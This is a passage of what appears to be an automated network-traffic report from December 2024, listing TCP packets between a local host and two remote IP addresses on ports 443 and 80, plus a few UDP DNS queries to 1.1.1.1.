                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 19, 2024 12:50:41.382834911 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:41.382965088 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:41.383105040 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:41.396394968 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:41.396461964 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:42.656326056 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:42.656485081 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:42.660391092 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:42.660404921 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:42.660913944 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:42.672539949 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:42.719347954 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.098707914 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.148742914 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.218564987 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.218586922 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.218610048 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.218619108 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.218637943 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.218671083 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.218684912 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.218696117 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.218738079 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.335345984 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.335386038 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.335520029 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.335552931 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.335588932 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.379082918 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.379116058 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.379264116 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.379297018 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.379333973 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.503927946 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.503964901 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.504076958 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.504110098 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.504148960 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.538455009 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.538496017 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.538566113 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.538608074 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.538633108 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.538646936 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.566611052 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.566647053 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.566720963 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.566751957 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.566787004 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.566800117 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.681230068 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.681277990 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.681312084 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.681340933 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.681355953 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.681372881 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.704575062 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.704616070 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.704667091 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.704689980 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.704766035 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.705236912 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.722701073 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.722738981 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.722812891 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.722835064 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.722851992 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.722871065 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.742882013 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.742918968 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.742964983 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.742980003 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.743036032 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.763873100 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.763911963 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.763952971 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.763962984 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.764013052 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.866810083 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.866889000 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.866921902 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.866941929 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.866983891 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.882556915 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.882613897 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.882651091 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.882672071 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.882714987 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.895291090 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.895378113 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.895406961 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.895417929 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.895466089 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.908806086 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.908869982 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.908902884 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.908915043 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.908963919 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.921940088 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.921976089 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.922025919 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.922036886 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.922096968 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.934437990 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.934477091 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.934557915 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.934571028 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.934617043 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.947763920 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.947853088 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.947885990 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.947897911 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.947947025 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.959456921 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.959498882 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.959541082 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:43.959552050 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:43.959604025 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.060949087 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.060991049 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.061037064 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.061053038 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.061096907 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.071007013 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.071043015 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.071094990 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.071111917 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.071141958 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.071162939 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.079289913 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.079334974 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.079385996 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.079399109 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.079446077 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.079463959 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.088385105 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.088418961 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.088474989 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.088485003 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.088526964 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.096921921 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.096959114 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.097009897 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.097023010 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.097091913 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.105233908 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.105269909 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.105380058 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.105391026 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.105424881 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.113852024 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.113892078 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.113934994 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.113944054 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.113993883 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.121530056 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.121567965 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.121611118 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.121623039 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.121669054 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.252456903 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.252500057 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.252537966 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.252568007 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.252584934 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.252605915 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.259638071 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.259702921 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.259723902 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.259738922 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.259799004 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.259799004 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.267108917 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.267146111 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.267195940 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.267206907 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.267246008 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.273246050 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.273279905 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.273324966 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.273343086 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.273356915 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.273374081 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.280390024 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.280426979 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.280477047 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.280494928 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.280515909 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.280531883 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.287425995 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.287461996 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.287550926 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.287568092 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.287575960 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.287619114 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.294653893 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.294689894 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.294725895 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.294743061 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.294780016 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.301752090 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.301789045 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.301830053 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.301836967 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.301868916 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.444873095 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.444910049 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.444943905 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.445014954 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.445024014 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.445060015 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.451666117 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.451695919 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.451772928 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.451786995 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.451817989 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.458952904 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.458987951 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.459043026 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.459053040 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.459101915 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.465380907 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.465401888 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.465473890 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.465485096 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.465538025 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.472678900 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.472712994 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.472762108 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.472770929 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.472816944 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.482326984 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.482358932 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.482404947 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.482414961 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.482538939 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.486509085 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.486535072 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.486618996 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.486649036 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.486695051 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.493952990 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.493993998 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.494033098 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.494060993 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.494088888 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.494107008 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.636547089 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.636590958 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.636692047 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.636692047 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.636723042 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.636765003 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.643642902 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.643682957 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.643757105 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.643769026 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.643801928 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.650919914 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.650950909 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.651088953 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.651103020 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.651140928 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.657356977 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.657392979 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.657507896 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.657520056 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.657563925 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.664652109 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.664688110 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.664804935 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.664814949 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.664853096 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.671389103 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.671412945 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.671514988 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.671525955 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.671556950 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.678828955 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.678885937 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.678963900 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.678973913 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.678996086 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.679014921 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.685915947 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.685959101 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.686033964 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.686043978 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.686091900 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.829472065 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.829544067 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.829804897 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.829804897 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.829832077 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.829866886 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.835937023 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.835993052 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.836019039 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.836029053 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.836070061 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.837073088 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.837131977 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.837137938 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.837172985 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.837218046 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.837260962 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.839842081 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:45.222167969 CET4970780192.168.2.8203.175.174.69
                                                                                              Dec 19, 2024 12:50:45.341846943 CET8049707203.175.174.69192.168.2.8
                                                                                              Dec 19, 2024 12:50:45.342021942 CET4970780192.168.2.8203.175.174.69
                                                                                              Dec 19, 2024 12:50:45.342175961 CET4970780192.168.2.8203.175.174.69
                                                                                              Dec 19, 2024 12:50:45.461586952 CET8049707203.175.174.69192.168.2.8
                                                                                              Dec 19, 2024 12:50:46.874804020 CET8049707203.175.174.69192.168.2.8
                                                                                              Dec 19, 2024 12:50:46.914393902 CET4970780192.168.2.8203.175.174.69
                                                                                              Dec 19, 2024 12:50:48.410336018 CET4970780192.168.2.8203.175.174.69

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 19, 2024 12:50:41.236665010 CET5568753192.168.2.81.1.1.1
                                                                                              Dec 19, 2024 12:50:41.374449015 CET53556871.1.1.1192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.995392084 CET5751053192.168.2.81.1.1.1
                                                                                              Dec 19, 2024 12:50:45.220695972 CET53575101.1.1.1192.168.2.8
                                                                                              Dec 19, 2024 12:50:55.645312071 CET6224053192.168.2.81.1.1.1
                                                                                              Dec 19, 2024 12:51:12.447738886 CET6176453192.168.2.81.1.1.1
                                                                                              Dec 19, 2024 12:51:24.891891956 CET6028153192.168.2.81.1.1.1

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
